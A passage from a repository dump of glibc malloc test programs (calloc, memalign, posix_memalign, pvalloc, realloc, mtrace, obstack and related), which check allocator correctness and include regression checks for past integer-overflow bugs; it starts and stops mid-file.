| { 48 | if (ptrs[i][j] != '\0') 49 | error (EXIT_FAILURE, 0, 50 | "byte not cleared (size %d, element %d, byte %d)", 51 | size, i, j); 52 | ptrs[i][j] = '\xff'; 53 | } 54 | } 55 | 56 | while (i-- > 0) 57 | free (ptrs[i]); 58 | } 59 | 60 | 61 | static void 62 | random_test (void) 63 | { 64 | char *ptrs[N]; 65 | int i; 66 | 67 | for (i = 0; i < N; ++i) 68 | { 69 | int j; 70 | int n = 1 + random () % 10; 71 | int elem = 1 + random () % 100; 72 | int size = n * elem; 73 | 74 | ptrs[i] = (char *) calloc (n, elem); 75 | 76 | if (ptrs[i] == NULL) 77 | break; 78 | 79 | for (j = 0; j < size; ++j) 80 | { 81 | if (ptrs[i][j] != '\0') 82 | error (EXIT_FAILURE, 0, 83 | "byte not cleared (size %d, element %d, byte %d)", 84 | size, i, j); 85 | ptrs[i][j] = '\xff'; 86 | } 87 | } 88 | 89 | while (i-- > 0) 90 | free (ptrs[i]); 91 | } 92 | 93 | 94 | static void 95 | null_test (void) 96 | { 97 | /* If the size is 0 the result is implementation defined. Just make 98 | sure the program doesn't crash. */ 99 | calloc (0, 0); 100 | calloc (0, UINT_MAX); 101 | calloc (UINT_MAX, 0); 102 | calloc (0, ~((size_t) 0)); 103 | calloc (~((size_t) 0), 0); 104 | } 105 | 106 | 107 | int 108 | main (void) 109 | { 110 | /* We are allocating blocks with `calloc' and check whether every 111 | block is completely cleared. We first try this for some fixed 112 | times and then with random size. */ 113 | fixed_test (15); 114 | fixed_test (5); 115 | fixed_test (17); 116 | fixed_test (6); 117 | fixed_test (31); 118 | fixed_test (96); 119 | 120 | random_test (); 121 | 122 | null_test (); 123 | 124 | return 0; 125 | } 126 | -------------------------------------------------------------------------------- /glibc/malloc/tst-malloc-usable.c: -------------------------------------------------------------------------------- 1 | /* Ensure that malloc_usable_size returns the request size with 2 | MALLOC_CHECK_ exported to a positive value. 3 | 4 | Copyright (C) 2012-2014 Free Software Foundation, Inc. 5 | This file is part of the GNU C Library. 6 | 7 | The GNU C Library is free software; you can redistribute it and/or 8 | modify it under the terms of the GNU Lesser General Public 9 | License as published by the Free Software Foundation; either 10 | version 2.1 of the License, or (at your option) any later version. 11 | 12 | The GNU C Library is distributed in the hope that it will be useful, 13 | but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | Lesser General Public License for more details. 16 | 17 | You should have received a copy of the GNU Lesser General Public 18 | License along with the GNU C Library; if not, see 19 | . */ 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | static int 26 | do_test (void) 27 | { 28 | size_t usable_size; 29 | void *p = malloc (7); 30 | if (!p) 31 | { 32 | printf ("memory allocation failed\n"); 33 | return 1; 34 | } 35 | 36 | usable_size = malloc_usable_size (p); 37 | if (usable_size != 7) 38 | { 39 | printf ("malloc_usable_size: expected 7 but got %zu\n", usable_size); 40 | return 1; 41 | } 42 | 43 | memset (p, 0, usable_size); 44 | free (p); 45 | return 0; 46 | } 47 | 48 | #define TEST_FUNCTION do_test () 49 | #include "../test-skeleton.c" 50 | -------------------------------------------------------------------------------- /glibc/malloc/tst-malloc.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1999-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | Contributed by Andreas Jaeger , 1999. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | static int errors = 0; 24 | 25 | static void 26 | merror (const char *msg) 27 | { 28 | ++errors; 29 | printf ("Error: %s\n", msg); 30 | } 31 | 32 | int 33 | main (void) 34 | { 35 | void *p, *q; 36 | int save; 37 | 38 | errno = 0; 39 | 40 | p = malloc (-1); 41 | save = errno; 42 | 43 | if (p != NULL) 44 | merror ("malloc (-1) succeeded."); 45 | 46 | if (p == NULL && save != ENOMEM) 47 | merror ("errno is not set correctly"); 48 | 49 | p = malloc (10); 50 | if (p == NULL) 51 | merror ("malloc (10) failed."); 52 | 53 | /* realloc (p, 0) == free (p). */ 54 | p = realloc (p, 0); 55 | if (p != NULL) 56 | merror ("realloc (p, 0) failed."); 57 | 58 | p = malloc (0); 59 | if (p == NULL) 60 | merror ("malloc (0) failed."); 61 | 62 | p = realloc (p, 0); 63 | if (p != NULL) 64 | merror ("realloc (p, 0) failed."); 65 | 66 | p = malloc (513 * 1024); 67 | if (p == NULL) 68 | merror ("malloc (513K) failed."); 69 | 70 | q = malloc (-512 * 1024); 71 | if (q != NULL) 72 | merror ("malloc (-512K) succeeded."); 73 | 74 | free (p); 75 | 76 | return errors != 0; 77 | } 78 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mallocfork.c: -------------------------------------------------------------------------------- 1 | /* Derived from the test case in 2 | http://sourceware.org/bugzilla/show_bug.cgi?id=838. */ 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | static void 12 | sig_handler (int signum) 13 | { 14 | pid_t child = fork (); 15 | if (child == 0) 16 | exit (0); 17 | TEMP_FAILURE_RETRY (waitpid (child, NULL, 0)); 18 | } 19 | 20 | static int 21 | do_test (void) 22 | { 23 | pid_t parent = getpid (); 24 | 25 | struct sigaction action = { .sa_handler = sig_handler }; 26 | sigemptyset (&action.sa_mask); 27 | 28 | malloc (sizeof (int)); 29 | 30 | if (sigaction (SIGALRM, &action, NULL) != 0) 31 | { 32 | puts ("sigaction failed"); 33 | return 1; 34 | } 35 | 36 | /* Create a child that sends the signal to be caught. */ 37 | pid_t child = fork (); 38 | if (child == 0) 39 | { 40 | if (kill (parent, SIGALRM) == -1) 41 | perror ("kill"); 42 | exit (0); 43 | } 44 | 45 | TEMP_FAILURE_RETRY (waitpid (child, NULL, 0)); 46 | 47 | return 0; 48 | } 49 | 50 | #define TEST_FUNCTION do_test () 51 | #include "../test-skeleton.c" 52 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mallocstate.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2001-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | Contributed by Wolfram Gloger , 2001. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include "malloc.h" 22 | 23 | static int errors = 0; 24 | 25 | static void 26 | merror (const char *msg) 27 | { 28 | ++errors; 29 | printf ("Error: %s\n", msg); 30 | } 31 | 32 | int 33 | main (void) 34 | { 35 | void *p1, *p2; 36 | void *save_state; 37 | long i; 38 | 39 | errno = 0; 40 | 41 | p1 = malloc (10); 42 | if (p1 == NULL) 43 | merror ("malloc (10) failed."); 44 | 45 | p2 = malloc (20); 46 | if (p2 == NULL) 47 | merror ("malloc (20) failed."); 48 | 49 | free (malloc (10)); 50 | 51 | for (i = 0; i < 100; ++i) 52 | { 53 | save_state = malloc_get_state (); 54 | if (save_state == NULL) 55 | { 56 | merror ("malloc_get_state () failed."); 57 | break; 58 | } 59 | /*free (malloc (10)); This could change the top chunk! */ 60 | malloc_set_state (save_state); 61 | p1 = realloc (p1, i * 4 + 4); 62 | if (p1 == NULL) 63 | merror ("realloc (i*4) failed."); 64 | free (save_state); 65 | } 66 | 67 | p1 = realloc (p1, 40); 68 | free (p2); 69 | p2 = malloc (10); 70 | if (p2 == NULL) 71 | merror ("malloc (10) failed."); 72 | free (p1); 73 | 74 | return errors != 0; 75 | } 76 | 77 | /* 78 | * Local variables: 79 | * c-basic-offset: 2 80 | * End: 81 | */ 82 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mallopt.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | #include 19 | #include 20 | #include 21 | 22 | static int errors = 0; 23 | 24 | static void 25 | merror (const char *msg) 26 | { 27 | ++errors; 28 | printf ("Error: %s\n", msg); 29 | } 30 | 31 | static int 32 | do_test (void) 33 | { 34 | int ret; 35 | 36 | ret = mallopt(M_CHECK_ACTION, 1); 37 | 38 | if (ret != 1) 39 | merror ("mallopt (M_CHECK_ACTION, 1) failed."); 40 | 41 | ret = mallopt(M_MMAP_MAX, 64*1024); 42 | 43 | if (ret != 1) 44 | merror ("mallopt (M_MMAP_MAX, 64*1024) failed."); 45 | 46 | ret = mallopt(M_MMAP_THRESHOLD, 64*1024); 47 | 48 | if (ret != 1) 49 | merror ("mallopt (M_MMAP_THRESHOLD, 64*1024) failed."); 50 | 51 | ret = mallopt(M_MXFAST, 0); 52 | 53 | if (ret != 1) 54 | merror ("mallopt (M_MXFAST, 0) failed."); 55 | 56 | ret = mallopt(M_PERTURB, 0xa5); 57 | 58 | if (ret != 1) 59 | merror ("mallopt (M_PERTURB, 0xa5) failed."); 60 | 61 | ret = mallopt(M_TOP_PAD, 64*1024); 62 | 63 | if (ret != 1) 64 | merror ("mallopt (M_TOP_PAD, 64*1024) failed."); 65 | 66 | ret = mallopt(M_TRIM_THRESHOLD, -1); 67 | 68 | if (ret != 1) 69 | merror ("mallopt (M_TRIM_THRESHOLD, -1) failed."); 70 | 71 | return errors != 0; 72 | } 73 | 74 | #define TEST_FUNCTION do_test () 75 | #include "../test-skeleton.c" 76 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mcheck.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2005-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | Contributed by Jakub Jelinek , 2005. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | static int errors = 0; 24 | 25 | static void 26 | merror (const char *msg) 27 | { 28 | ++errors; 29 | printf ("Error: %s\n", msg); 30 | } 31 | 32 | int 33 | main (void) 34 | { 35 | void *p, *q; 36 | 37 | errno = 0; 38 | 39 | p = malloc (-1); 40 | 41 | if (p != NULL) 42 | merror ("malloc (-1) succeeded."); 43 | else if (errno != ENOMEM) 44 | merror ("errno is not set correctly."); 45 | 46 | p = malloc (10); 47 | if (p == NULL) 48 | merror ("malloc (10) failed."); 49 | 50 | p = realloc (p, 0); 51 | if (p != NULL) 52 | merror ("realloc (p, 0) failed."); 53 | 54 | p = malloc (0); 55 | if (p == NULL) 56 | merror ("malloc (0) failed."); 57 | 58 | p = realloc (p, 0); 59 | if (p != NULL) 60 | merror ("realloc (p, 0) failed."); 61 | 62 | q = malloc (256); 63 | if (q == NULL) 64 | merror ("malloc (256) failed."); 65 | 66 | p = malloc (512); 67 | if (p == NULL) 68 | merror ("malloc (512) failed."); 69 | 70 | if (realloc (p, -256) != NULL) 71 | merror ("realloc (p, -256) succeeded."); 72 | else if (errno != ENOMEM) 73 | merror ("errno is not set correctly."); 74 | 75 | free (p); 76 | 77 | p = malloc (512); 78 | if (p == NULL) 79 | merror ("malloc (512) failed."); 80 | 81 | if (realloc (p, -1) != NULL) 82 | merror ("realloc (p, -1) succeeded."); 83 | else if (errno != ENOMEM) 84 | merror ("errno is not set correctly."); 85 | 86 | free (p); 87 | free (q); 88 | 89 | return errors != 0; 90 | } 91 | -------------------------------------------------------------------------------- /glibc/malloc/tst-memalign.c: -------------------------------------------------------------------------------- 1 | /* Test for memalign. 2 | Copyright (C) 2013-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | static int errors = 0; 26 | 27 | static void 28 | merror (const char *msg) 29 | { 30 | ++errors; 31 | printf ("Error: %s\n", msg); 32 | } 33 | 34 | static int 35 | do_test (void) 36 | { 37 | void *p; 38 | unsigned long pagesize = getpagesize (); 39 | unsigned long ptrval; 40 | int save; 41 | 42 | errno = 0; 43 | 44 | /* An attempt to allocate a huge value should return NULL and set 45 | errno to ENOMEM. */ 46 | p = memalign (sizeof (void *), -1); 47 | 48 | save = errno; 49 | 50 | if (p != NULL) 51 | merror ("memalign (sizeof (void *), -1) succeeded."); 52 | 53 | if (p == NULL && save != ENOMEM) 54 | merror ("memalign (sizeof (void *), -1) errno is not set correctly"); 55 | 56 | free (p); 57 | 58 | errno = 0; 59 | 60 | /* Test to expose integer overflow in malloc internals from BZ #15857. */ 61 | p = memalign (pagesize, -pagesize); 62 | 63 | save = errno; 64 | 65 | if (p != NULL) 66 | merror ("memalign (pagesize, -pagesize) succeeded."); 67 | 68 | if (p == NULL && save != ENOMEM) 69 | merror ("memalign (pagesize, -pagesize) errno is not set correctly"); 70 | 71 | free (p); 72 | 73 | errno = 0; 74 | 75 | /* Test to expose integer overflow in malloc internals from BZ #16038. */ 76 | p = memalign (-1, pagesize); 77 | 78 | save = errno; 79 | 80 | if (p != NULL) 81 | merror ("memalign (-1, pagesize) succeeded."); 82 | 83 | if (p == NULL && save != EINVAL) 84 | merror ("memalign (-1, pagesize) errno is not set correctly"); 85 | 86 | free (p); 87 | 88 | /* A zero-sized allocation should succeed with glibc, returning a 89 | non-NULL value. */ 90 | p = memalign (sizeof (void *), 0); 91 | 92 | if (p == NULL) 93 | merror ("memalign (sizeof (void *), 0) failed."); 94 | 95 | free (p); 96 | 97 | /* Check the alignment of the returned pointer is correct. */ 98 | p = memalign (0x100, 10); 99 | 100 | if (p == NULL) 101 | merror ("memalign (0x100, 10) failed."); 102 | 103 | ptrval = (unsigned long) p; 104 | 105 | if ((ptrval & 0xff) != 0) 106 | merror ("pointer is not aligned to 0x100"); 107 | 108 | free (p); 109 | 110 | return errors != 0; 111 | } 112 | 113 | #define TEST_FUNCTION do_test () 114 | #include "../test-skeleton.c" 115 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mtrace.c: -------------------------------------------------------------------------------- 1 | /* Test program for mtrace. 2 | Copyright (C) 2000-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | 27 | static void print (const void *node, VISIT value, int level); 28 | 29 | /* Used for several purposes. */ 30 | static FILE *fp; 31 | 32 | 33 | int 34 | main (void) 35 | { 36 | void *root = NULL; 37 | size_t linelen = 0; 38 | char *line = NULL; 39 | 40 | /* Enable memory usage tracing. */ 41 | mtrace (); 42 | 43 | /* Perform some operations which definitely will allocate some 44 | memory. */ 45 | fp = fopen (__FILE__, "r"); 46 | if (fp == NULL) 47 | /* Shouldn't happen since this program is executed in the source 48 | directory. */ 49 | abort (); 50 | 51 | while (!feof (fp)) 52 | { 53 | char **p; 54 | char *copy; 55 | ssize_t n = getline (&line, &linelen, fp); 56 | 57 | if (n < 0) 58 | break; 59 | 60 | if (n == 0) 61 | continue; 62 | 63 | copy = strdup (line); 64 | if (copy == NULL) 65 | abort (); 66 | 67 | p = (char **) tsearch (copy, &root, 68 | (int (*)(const void *, const void *))strcmp); 69 | if (*p != copy) 70 | /* This line wasn't added. */ 71 | free (copy); 72 | } 73 | 74 | fclose (fp); 75 | 76 | fp = fopen (_PATH_DEVNULL, "w"); 77 | if (fp != NULL) 78 | { 79 | /* Write something through stdout. */ 80 | twalk (root, print); 81 | 82 | fclose (fp); 83 | } 84 | 85 | /* Free everything. */ 86 | tdestroy (root, free); 87 | 88 | /* Also the line buffer. */ 89 | free (line); 90 | 91 | /* That's it. */ 92 | return 0; 93 | } 94 | 95 | 96 | static void 97 | print (const void *node, VISIT value, int level) 98 | { 99 | static int cnt; 100 | if (value == postorder || value == leaf) 101 | fprintf (fp, "%3d: %s", ++cnt, *(const char **) node); 102 | } 103 | -------------------------------------------------------------------------------- /glibc/malloc/tst-mtrace.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # Testing the mtrace function. 3 | # Copyright (C) 2000-2014 Free Software Foundation, Inc. 4 | # This file is part of the GNU C Library. 5 | 6 | # The GNU C Library is free software; you can redistribute it and/or 7 | # modify it under the terms of the GNU Lesser General Public 8 | # License as published by the Free Software Foundation; either 9 | # version 2.1 of the License, or (at your option) any later version. 10 | 11 | # The GNU C Library is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | # Lesser General Public License for more details. 15 | 16 | # You should have received a copy of the GNU Lesser General Public 17 | # License along with the GNU C Library; if not, see 18 | # . 19 | 20 | set -e 21 | 22 | common_objpfx=$1; shift 23 | test_program_prefix_before_env=$1; shift 24 | run_program_env=$1; shift 25 | test_program_prefix_after_env=$1; shift 26 | 27 | status=0 28 | trap "rm -f ${common_objpfx}malloc/tst-mtrace.leak; exit 1" 1 2 15 29 | 30 | ${test_program_prefix_before_env} \ 31 | ${run_program_env} \ 32 | MALLOC_TRACE=${common_objpfx}malloc/tst-mtrace.leak \ 33 | ${test_program_prefix_after_env} \ 34 | ${common_objpfx}malloc/tst-mtrace || status=1 35 | 36 | if test $status -eq 0 && test -f ${common_objpfx}malloc/mtrace; then 37 | ${common_objpfx}malloc/mtrace ${common_objpfx}malloc/tst-mtrace.leak \ 38 | > ${common_objpfx}malloc/tst-mtrace.out|| status=1 39 | fi 40 | 41 | rm -f ${common_objpfx}malloc/tst-mtrace.leak 42 | 43 | exit $status 44 | -------------------------------------------------------------------------------- /glibc/malloc/tst-obstack.c: -------------------------------------------------------------------------------- 1 | /* Test case by Alexandre Duret-Lutz . */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define obstack_chunk_alloc verbose_malloc 8 | #define obstack_chunk_free verbose_free 9 | #define ALIGN_BOUNDARY 64 10 | #define ALIGN_MASK (ALIGN_BOUNDARY - 1) 11 | #define OBJECT_SIZE 1000 12 | 13 | static void * 14 | verbose_malloc (size_t size) 15 | { 16 | void *buf = malloc (size); 17 | printf ("malloc (%zu) => %p\n", size, buf); 18 | return buf; 19 | } 20 | 21 | static void 22 | verbose_free (void *buf) 23 | { 24 | free (buf); 25 | printf ("free (%p)\n", buf); 26 | } 27 | 28 | int 29 | main (void) 30 | { 31 | int result = 0; 32 | int align = 2; 33 | 34 | while (align <= 64) 35 | { 36 | struct obstack obs; 37 | int i; 38 | int align_mask = align - 1; 39 | 40 | printf ("\n Alignment mask: %d\n", align_mask); 41 | 42 | obstack_init (&obs); 43 | obstack_alignment_mask (&obs) = align_mask; 44 | /* finish an empty object to take alignment into account */ 45 | obstack_finish (&obs); 46 | 47 | /* let's allocate some objects and print their addresses */ 48 | for (i = 15; i > 0; --i) 49 | { 50 | void *obj = obstack_alloc (&obs, OBJECT_SIZE); 51 | 52 | printf ("obstack_alloc (%u) => %p \t%s\n", OBJECT_SIZE, obj, 53 | ((uintptr_t) obj & align_mask) ? "(not aligned)" : ""); 54 | result |= ((uintptr_t) obj & align_mask) != 0; 55 | } 56 | 57 | /* clean up */ 58 | obstack_free (&obs, 0); 59 | 60 | align <<= 1; 61 | } 62 | 63 | return result; 64 | } 65 | -------------------------------------------------------------------------------- /glibc/malloc/tst-posix_memalign.c: -------------------------------------------------------------------------------- 1 | /* Test for posix_memalign. 2 | Copyright (C) 2013-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | static int errors = 0; 26 | 27 | static void 28 | merror (const char *msg) 29 | { 30 | ++errors; 31 | printf ("Error: %s\n", msg); 32 | } 33 | 34 | static int 35 | do_test (void) 36 | { 37 | void *p; 38 | int ret; 39 | unsigned long pagesize = getpagesize (); 40 | unsigned long ptrval; 41 | 42 | p = NULL; 43 | 44 | /* An attempt to allocate a huge value should return ENOMEM and 45 | p should remain NULL. */ 46 | ret = posix_memalign (&p, sizeof (void *), -1); 47 | 48 | if (ret != ENOMEM) 49 | merror ("posix_memalign (&p, sizeof (void *), -1) succeeded."); 50 | 51 | if (ret == ENOMEM && p != NULL) 52 | merror ("returned an error but pointer was modified"); 53 | 54 | free (p); 55 | 56 | p = NULL; 57 | 58 | /* Test to expose integer overflow in malloc internals from BZ #15857. */ 59 | ret = posix_memalign (&p, pagesize, -pagesize); 60 | 61 | if (ret != ENOMEM) 62 | merror ("posix_memalign (&p, pagesize, -pagesize) succeeded."); 63 | 64 | free (p); 65 | 66 | p = NULL; 67 | 68 | /* Test to expose integer overflow in malloc internals from BZ #16038. */ 69 | ret = posix_memalign (&p, -1, pagesize); 70 | 71 | if (ret != EINVAL) 72 | merror ("posix_memalign (&p, -1, pagesize) succeeded."); 73 | 74 | free (p); 75 | 76 | p = NULL; 77 | 78 | /* A zero-sized allocation should succeed with glibc, returning zero 79 | and setting p to a non-NULL value. */ 80 | ret = posix_memalign (&p, sizeof (void *), 0); 81 | 82 | if (ret != 0 || p == NULL) 83 | merror ("posix_memalign (&p, sizeof (void *), 0) failed."); 84 | 85 | free (p); 86 | 87 | ret = posix_memalign (&p, 0x300, 10); 88 | 89 | if (ret != EINVAL) 90 | merror ("posix_memalign (&p, 0x300, 10) succeeded."); 91 | 92 | ret = posix_memalign (&p, 0, 10); 93 | 94 | if (ret != EINVAL) 95 | merror ("posix_memalign (&p, 0, 10) succeeded."); 96 | 97 | p = NULL; 98 | 99 | ret = posix_memalign (&p, 0x100, 10); 100 | 101 | if (ret != 0) 102 | merror ("posix_memalign (&p, 0x100, 10) failed."); 103 | 104 | if (ret == 0 && p == NULL) 105 | merror ("returned success but pointer is NULL"); 106 | 107 | ptrval = (unsigned long) p; 108 | 109 | if (ret == 0 && (ptrval & 0xff) != 0) 110 | merror ("pointer is not aligned to 0x100"); 111 | 112 | free (p); 113 | 114 | return errors != 0; 115 | } 116 | 117 | #define TEST_FUNCTION do_test () 118 | #include "../test-skeleton.c" 119 | -------------------------------------------------------------------------------- /glibc/malloc/tst-pvalloc.c: -------------------------------------------------------------------------------- 1 | /* Test for pvalloc. 2 | Copyright (C) 2013-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | static int errors = 0; 26 | 27 | static void 28 | merror (const char *msg) 29 | { 30 | ++errors; 31 | printf ("Error: %s\n", msg); 32 | } 33 | 34 | static int 35 | do_test (void) 36 | { 37 | void *p; 38 | unsigned long pagesize = getpagesize (); 39 | unsigned long ptrval; 40 | int save; 41 | 42 | errno = 0; 43 | 44 | /* An attempt to allocate a huge value should return NULL and set 45 | errno to ENOMEM. */ 46 | p = pvalloc (-1); 47 | 48 | save = errno; 49 | 50 | if (p != NULL) 51 | merror ("pvalloc (-1) succeeded."); 52 | 53 | if (p == NULL && save != ENOMEM) 54 | merror ("pvalloc (-1) errno is not set correctly"); 55 | 56 | free (p); 57 | 58 | errno = 0; 59 | 60 | /* Test to expose integer overflow in malloc internals from BZ #15855. */ 61 | p = pvalloc (-pagesize); 62 | 63 | save = errno; 64 | 65 | if (p != NULL) 66 | merror ("pvalloc (-pagesize) succeeded."); 67 | 68 | if (p == NULL && save != ENOMEM) 69 | merror ("pvalloc (-pagesize) errno is not set correctly"); 70 | 71 | free (p); 72 | 73 | /* A zero-sized allocation should succeed with glibc, returning a 74 | non-NULL value. */ 75 | p = pvalloc (0); 76 | 77 | if (p == NULL) 78 | merror ("pvalloc (0) failed."); 79 | 80 | free (p); 81 | 82 | /* Check the alignment of the returned pointer is correct. */ 83 | p = pvalloc (32); 84 | 85 | if (p == NULL) 86 | merror ("pvalloc (32) failed."); 87 | 88 | ptrval = (unsigned long) p; 89 | 90 | if ((ptrval & (pagesize - 1)) != 0) 91 | merror ("returned pointer is not page aligned."); 92 | 93 | free (p); 94 | 95 | return errors != 0; 96 | } 97 | 98 | #define TEST_FUNCTION do_test () 99 | #include "../test-skeleton.c" 100 | -------------------------------------------------------------------------------- /glibc/malloc/tst-realloc.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2013-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | static int errors = 0; 24 | 25 | static void 26 | merror (const char *msg) 27 | { 28 | ++errors; 29 | printf ("Error: %s\n", msg); 30 | } 31 | 32 | static int 33 | do_test (void) 34 | { 35 | void *p; 36 | unsigned char *c; 37 | int save, i, ok; 38 | 39 | errno = 0; 40 | 41 | /* realloc (NULL, ...) behaves similarly to malloc (C89). */ 42 | p = realloc (NULL, -1); 43 | save = errno; 44 | 45 | if (p != NULL) 46 | merror ("realloc (NULL, -1) succeeded."); 47 | 48 | /* errno should be set to ENOMEM on failure (POSIX). */ 49 | if (p == NULL && save != ENOMEM) 50 | merror ("errno is not set correctly"); 51 | 52 | errno = 0; 53 | 54 | /* realloc (NULL, ...) behaves similarly to malloc (C89). */ 55 | p = realloc (NULL, 10); 56 | save = errno; 57 | 58 | if (p == NULL) 59 | merror ("realloc (NULL, 10) failed."); 60 | 61 | /* errno should be clear on success (POSIX). */ 62 | if (p != NULL && save != 0) 63 | merror ("errno is set but should not be"); 64 | 65 | free (p); 66 | 67 | p = calloc (20, 1); 68 | if (p == NULL) 69 | merror ("calloc (20, 1) failed."); 70 | 71 | /* Check increasing size preserves contents (C89). */ 72 | p = realloc (p, 200); 73 | if (p == NULL) 74 | merror ("realloc (p, 200) failed."); 75 | 76 | c = 